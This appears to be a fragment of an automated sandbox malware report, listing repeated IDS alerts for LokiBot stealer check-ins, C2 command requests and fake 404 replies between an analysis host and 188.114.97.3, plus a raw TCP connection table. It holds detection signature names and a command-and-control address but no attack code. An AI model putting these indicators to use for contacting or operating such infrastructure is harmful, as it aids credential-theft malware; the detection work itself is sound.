              2024-09-25T10:20:48.049566+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749815188.114.97.380TCP
              2024-09-25T10:20:48.049566+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749815188.114.97.380TCP
              2024-09-25T10:20:48.054731+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749815TCP
              2024-09-25T10:20:48.345316+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749816188.114.97.380TCP
              2024-09-25T10:20:48.345316+02002025381ET MALWARE LokiBot Checkin1192.168.2.749816188.114.97.380TCP
              2024-09-25T10:20:48.345316+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749816188.114.97.380TCP
              2024-09-25T10:20:49.020610+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749816188.114.97.380TCP
              2024-09-25T10:20:49.020610+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749816188.114.97.380TCP
              2024-09-25T10:20:49.025566+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749816TCP
              2024-09-25T10:20:49.177011+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749817188.114.97.380TCP
              2024-09-25T10:20:49.177011+02002025381ET MALWARE LokiBot Checkin1192.168.2.749817188.114.97.380TCP
              2024-09-25T10:20:49.177011+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749817188.114.97.380TCP
              2024-09-25T10:20:50.103271+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749817188.114.97.380TCP
              2024-09-25T10:20:50.103271+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749817188.114.97.380TCP
              2024-09-25T10:20:50.108060+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749817TCP
              2024-09-25T10:20:50.264754+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749818188.114.97.380TCP
              2024-09-25T10:20:50.264754+02002025381ET MALWARE LokiBot Checkin1192.168.2.749818188.114.97.380TCP
              2024-09-25T10:20:50.264754+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749818188.114.97.380TCP
              2024-09-25T10:20:50.944188+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749818188.114.97.380TCP
              2024-09-25T10:20:50.944188+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749818188.114.97.380TCP
              2024-09-25T10:20:50.954575+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749818TCP
              2024-09-25T10:20:51.117098+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749819188.114.97.380TCP
              2024-09-25T10:20:51.117098+02002025381ET MALWARE LokiBot Checkin1192.168.2.749819188.114.97.380TCP
              2024-09-25T10:20:51.117098+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749819188.114.97.380TCP
              2024-09-25T10:20:51.808740+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749819188.114.97.380TCP
              2024-09-25T10:20:51.808740+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749819188.114.97.380TCP
              2024-09-25T10:20:51.813535+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749819TCP
              2024-09-25T10:20:51.965926+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749820188.114.97.380TCP
              2024-09-25T10:20:51.965926+02002025381ET MALWARE LokiBot Checkin1192.168.2.749820188.114.97.380TCP
              2024-09-25T10:20:51.965926+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749820188.114.97.380TCP
              2024-09-25T10:20:52.620616+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749820188.114.97.380TCP
              2024-09-25T10:20:52.620616+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749820188.114.97.380TCP
              2024-09-25T10:20:52.625510+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749820TCP
              2024-09-25T10:20:52.847890+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749821188.114.97.380TCP
              2024-09-25T10:20:52.847890+02002025381ET MALWARE LokiBot Checkin1192.168.2.749821188.114.97.380TCP
              2024-09-25T10:20:52.847890+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749821188.114.97.380TCP
              2024-09-25T10:20:53.479823+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749821188.114.97.380TCP
              2024-09-25T10:20:53.479823+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749821188.114.97.380TCP
              2024-09-25T10:20:53.484717+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749821TCP
              2024-09-25T10:20:53.648400+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749822188.114.97.380TCP
              2024-09-25T10:20:53.648400+02002025381ET MALWARE LokiBot Checkin1192.168.2.749822188.114.97.380TCP
              2024-09-25T10:20:53.648400+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749822188.114.97.380TCP
              2024-09-25T10:20:54.312873+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749822188.114.97.380TCP
              2024-09-25T10:20:54.312873+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749822188.114.97.380TCP
              2024-09-25T10:20:54.318662+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749822TCP
              2024-09-25T10:20:54.469239+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749823188.114.97.380TCP
              2024-09-25T10:20:54.469239+02002025381ET MALWARE LokiBot Checkin1192.168.2.749823188.114.97.380TCP
              2024-09-25T10:20:54.469239+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749823188.114.97.380TCP
              2024-09-25T10:20:55.121000+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749823188.114.97.380TCP
              2024-09-25T10:20:55.121000+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749823188.114.97.380TCP
              2024-09-25T10:20:55.126025+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749823TCP
              2024-09-25T10:20:55.277763+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749824188.114.97.380TCP
              2024-09-25T10:20:55.277763+02002025381ET MALWARE LokiBot Checkin1192.168.2.749824188.114.97.380TCP
              2024-09-25T10:20:55.277763+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749824188.114.97.380TCP
              2024-09-25T10:20:55.938989+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749824188.114.97.380TCP
              2024-09-25T10:20:55.938989+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749824188.114.97.380TCP
              2024-09-25T10:20:55.943963+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749824TCP
              2024-09-25T10:20:56.095548+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749825188.114.97.380TCP
              2024-09-25T10:20:56.095548+02002025381ET MALWARE LokiBot Checkin1192.168.2.749825188.114.97.380TCP
              2024-09-25T10:20:56.095548+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749825188.114.97.380TCP
              2024-09-25T10:20:56.779578+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749825188.114.97.380TCP
              2024-09-25T10:20:56.779578+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749825188.114.97.380TCP
              2024-09-25T10:20:56.785409+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749825TCP
              2024-09-25T10:20:56.943672+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749826188.114.97.380TCP
              2024-09-25T10:20:56.943672+02002025381ET MALWARE LokiBot Checkin1192.168.2.749826188.114.97.380TCP
              2024-09-25T10:20:56.943672+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749826188.114.97.380TCP
              2024-09-25T10:20:57.616206+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749826188.114.97.380TCP
              2024-09-25T10:20:57.616206+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749826188.114.97.380TCP
              2024-09-25T10:20:57.621047+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749826TCP
              2024-09-25T10:20:57.765117+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749827188.114.97.380TCP
              2024-09-25T10:20:57.765117+02002025381ET MALWARE LokiBot Checkin1192.168.2.749827188.114.97.380TCP
              2024-09-25T10:20:57.765117+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749827188.114.97.380TCP
              2024-09-25T10:20:58.434386+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749827188.114.97.380TCP
              2024-09-25T10:20:58.434386+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749827188.114.97.380TCP
              2024-09-25T10:20:58.439188+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749827TCP
              2024-09-25T10:20:58.604735+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749828188.114.97.380TCP
              2024-09-25T10:20:58.604735+02002025381ET MALWARE LokiBot Checkin1192.168.2.749828188.114.97.380TCP
              2024-09-25T10:20:58.604735+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749828188.114.97.380TCP
              2024-09-25T10:20:59.260870+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749828188.114.97.380TCP
              2024-09-25T10:20:59.260870+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749828188.114.97.380TCP
              2024-09-25T10:20:59.265646+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749828TCP
              2024-09-25T10:21:00.485716+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749829188.114.97.380TCP
              2024-09-25T10:21:00.485716+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749829188.114.97.380TCP
              2024-09-25T10:21:00.485716+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749829188.114.97.380TCP
              2024-09-25T10:21:00.485716+02002025381ET MALWARE LokiBot Checkin1192.168.2.749829188.114.97.380TCP
              2024-09-25T10:21:00.485716+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749829188.114.97.380TCP
              2024-09-25T10:21:00.492931+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749829TCP
              2024-09-25T10:21:00.652378+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749830188.114.97.380TCP
              2024-09-25T10:21:00.652378+02002025381ET MALWARE LokiBot Checkin1192.168.2.749830188.114.97.380TCP
              2024-09-25T10:21:00.652378+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749830188.114.97.380TCP
              2024-09-25T10:21:01.352133+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749830188.114.97.380TCP
              2024-09-25T10:21:01.352133+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749830188.114.97.380TCP
              2024-09-25T10:21:01.357871+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749830TCP
              2024-09-25T10:21:01.509563+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749831188.114.97.380TCP
              2024-09-25T10:21:01.509563+02002025381ET MALWARE LokiBot Checkin1192.168.2.749831188.114.97.380TCP
              2024-09-25T10:21:01.509563+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749831188.114.97.380TCP
              2024-09-25T10:21:02.141157+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749831188.114.97.380TCP
              2024-09-25T10:21:02.141157+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749831188.114.97.380TCP
              2024-09-25T10:21:02.145946+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749831TCP
              2024-09-25T10:21:02.530015+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749832188.114.97.380TCP
              2024-09-25T10:21:02.530015+02002025381ET MALWARE LokiBot Checkin1192.168.2.749832188.114.97.380TCP
              2024-09-25T10:21:02.530015+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749832188.114.97.380TCP
              2024-09-25T10:21:03.199950+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749832188.114.97.380TCP
              2024-09-25T10:21:03.199950+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749832188.114.97.380TCP
              2024-09-25T10:21:03.204695+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749832TCP
              2024-09-25T10:21:03.370905+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749833188.114.97.380TCP
              2024-09-25T10:21:03.370905+02002025381ET MALWARE LokiBot Checkin1192.168.2.749833188.114.97.380TCP
              2024-09-25T10:21:03.370905+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749833188.114.97.380TCP
              2024-09-25T10:21:04.015053+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749833188.114.97.380TCP
              2024-09-25T10:21:04.015053+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749833188.114.97.380TCP
              2024-09-25T10:21:04.019903+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749833TCP
              2024-09-25T10:21:04.493818+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749834188.114.97.380TCP
              2024-09-25T10:21:04.493818+02002025381ET MALWARE LokiBot Checkin1192.168.2.749834188.114.97.380TCP
              2024-09-25T10:21:04.493818+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749834188.114.97.380TCP
              2024-09-25T10:21:05.131735+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749834188.114.97.380TCP
              2024-09-25T10:21:05.131735+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749834188.114.97.380TCP
              2024-09-25T10:21:05.136585+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749834TCP
              2024-09-25T10:21:05.272946+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749835188.114.97.380TCP
              2024-09-25T10:21:05.272946+02002025381ET MALWARE LokiBot Checkin1192.168.2.749835188.114.97.380TCP
              2024-09-25T10:21:05.272946+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749835188.114.97.380TCP
              2024-09-25T10:21:05.949911+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749835188.114.97.380TCP
              2024-09-25T10:21:05.949911+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749835188.114.97.380TCP
              2024-09-25T10:21:05.954767+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749835TCP
              2024-09-25T10:21:06.101214+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749836188.114.97.380TCP
              2024-09-25T10:21:06.101214+02002025381ET MALWARE LokiBot Checkin1192.168.2.749836188.114.97.380TCP
              2024-09-25T10:21:06.101214+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749836188.114.97.380TCP
              2024-09-25T10:21:06.745448+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749836188.114.97.380TCP
              2024-09-25T10:21:06.745448+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749836188.114.97.380TCP
              2024-09-25T10:21:06.752043+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749836TCP
              2024-09-25T10:21:06.901425+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749837188.114.97.380TCP
              2024-09-25T10:21:06.901425+02002025381ET MALWARE LokiBot Checkin1192.168.2.749837188.114.97.380TCP
              2024-09-25T10:21:06.901425+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749837188.114.97.380TCP
              2024-09-25T10:21:07.563958+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749837188.114.97.380TCP
              2024-09-25T10:21:07.563958+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749837188.114.97.380TCP
              2024-09-25T10:21:07.597503+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749837TCP
              2024-09-25T10:21:07.859251+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749838188.114.97.380TCP
              2024-09-25T10:21:07.859251+02002025381ET MALWARE LokiBot Checkin1192.168.2.749838188.114.97.380TCP
              2024-09-25T10:21:07.859251+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749838188.114.97.380TCP
              2024-09-25T10:21:08.545523+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749838188.114.97.380TCP
              2024-09-25T10:21:08.545523+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749838188.114.97.380TCP
              2024-09-25T10:21:08.550360+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749838TCP
              2024-09-25T10:21:09.943417+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749839188.114.97.380TCP
              2024-09-25T10:21:09.943417+02002025381ET MALWARE LokiBot Checkin1192.168.2.749839188.114.97.380TCP
              2024-09-25T10:21:09.943417+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749839188.114.97.380TCP
              2024-09-25T10:21:10.666965+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749839188.114.97.380TCP
              2024-09-25T10:21:10.666965+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749839188.114.97.380TCP
              2024-09-25T10:21:10.675340+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749839TCP
              2024-09-25T10:21:10.818081+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749840188.114.97.380TCP
              2024-09-25T10:21:10.818081+02002025381ET MALWARE LokiBot Checkin1192.168.2.749840188.114.97.380TCP
              2024-09-25T10:21:10.818081+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749840188.114.97.380TCP
              2024-09-25T10:21:11.513058+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749840188.114.97.380TCP
              2024-09-25T10:21:11.513058+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749840188.114.97.380TCP
              2024-09-25T10:21:11.517815+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749840TCP
              2024-09-25T10:21:11.674440+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749841188.114.97.380TCP
              2024-09-25T10:21:11.674440+02002025381ET MALWARE LokiBot Checkin1192.168.2.749841188.114.97.380TCP
              2024-09-25T10:21:11.674440+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749841188.114.97.380TCP
              2024-09-25T10:21:12.356325+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749841188.114.97.380TCP
              2024-09-25T10:21:12.356325+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749841188.114.97.380TCP
              2024-09-25T10:21:12.361141+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749841TCP
              2024-09-25T10:21:12.571148+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749842188.114.97.380TCP
              2024-09-25T10:21:12.571148+02002025381ET MALWARE LokiBot Checkin1192.168.2.749842188.114.97.380TCP
              2024-09-25T10:21:12.571148+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749842188.114.97.380TCP
              2024-09-25T10:21:13.248308+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749842188.114.97.380TCP
              2024-09-25T10:21:13.248308+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749842188.114.97.380TCP
              TimestampSource PortDest PortSource IPDest IP
              Sep 25, 2024 10:19:08.199548960 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:08.204461098 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:08.204586983 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:08.206741095 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:08.211561918 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:08.211637974 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:08.216398954 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.125356913 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.125494003 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.125518084 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.125547886 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.125571966 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.125597954 CEST4969980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.130742073 CEST8049699188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.249906063 CEST4970080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.255167007 CEST8049700188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.255420923 CEST4970080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.257600069 CEST4970080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.263339043 CEST8049700188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.263458014 CEST4970080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.269010067 CEST8049700188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.982157946 CEST8049700188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.982172966 CEST8049700188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:09.982295036 CEST4970080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.982342958 CEST4970080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:09.987123013 CEST8049700188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.050923109 CEST4970180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.055901051 CEST8049701188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.056020021 CEST4970180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.058101892 CEST4970180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.062851906 CEST8049701188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.062927008 CEST4970180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.067766905 CEST8049701188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.811630011 CEST8049701188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.811769962 CEST4970180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.811793089 CEST8049701188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.811836004 CEST4970180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.817841053 CEST8049701188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.956973076 CEST4970280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.962050915 CEST8049702188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.962202072 CEST4970280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.964413881 CEST4970280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.969232082 CEST8049702188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:10.969314098 CEST4970280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:10.974152088 CEST8049702188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:11.665431976 CEST8049702188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:11.665714025 CEST4970280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:11.666590929 CEST8049702188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:11.666637897 CEST4970280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:11.670551062 CEST8049702188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:11.821324110 CEST4970380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:11.830368042 CEST8049703188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:11.830593109 CEST4970380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:11.832576036 CEST4970380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:11.837702990 CEST8049703188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:11.837774038 CEST4970380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:11.842582941 CEST8049703188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:12.530971050 CEST8049703188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:12.531179905 CEST4970380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:12.531327009 CEST8049703188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:12.531404018 CEST4970380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:12.537084103 CEST8049703188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:12.676207066 CEST4970480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:12.681502104 CEST8049704188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:12.681730032 CEST4970480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:12.683944941 CEST4970480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:12.688783884 CEST8049704188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:12.688863993 CEST4970480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:12.693780899 CEST8049704188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:13.452939987 CEST8049704188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:13.453181982 CEST4970480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:13.453852892 CEST8049704188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:13.453994989 CEST4970480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:13.460990906 CEST8049704188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:13.600874901 CEST4970580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:13.606182098 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:13.606321096 CEST4970580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:13.608577967 CEST4970580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:13.614825964 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:13.615421057 CEST4970580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:13.621648073 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.450290918 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.450306892 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.450320959 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.450457096 CEST4970580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:14.451877117 CEST4970580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:14.459844112 CEST8049705188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.699407101 CEST4970680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:14.704406023 CEST8049706188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.704498053 CEST4970680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:14.706671953 CEST4970680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:14.711503983 CEST8049706188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:14.711569071 CEST4970680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:14.716377020 CEST8049706188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:15.399228096 CEST8049706188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:15.399528027 CEST4970680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:15.399653912 CEST8049706188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:15.399701118 CEST4970680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:15.404340982 CEST8049706188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:15.568581104 CEST4970780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:15.573679924 CEST8049707188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:15.573864937 CEST4970780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:15.576531887 CEST4970780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:15.581321001 CEST8049707188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:15.581402063 CEST4970780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:15.586268902 CEST8049707188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:16.220118999 CEST8049707188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:16.220300913 CEST4970780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:16.220407009 CEST8049707188.114.97.3192.168.2.7
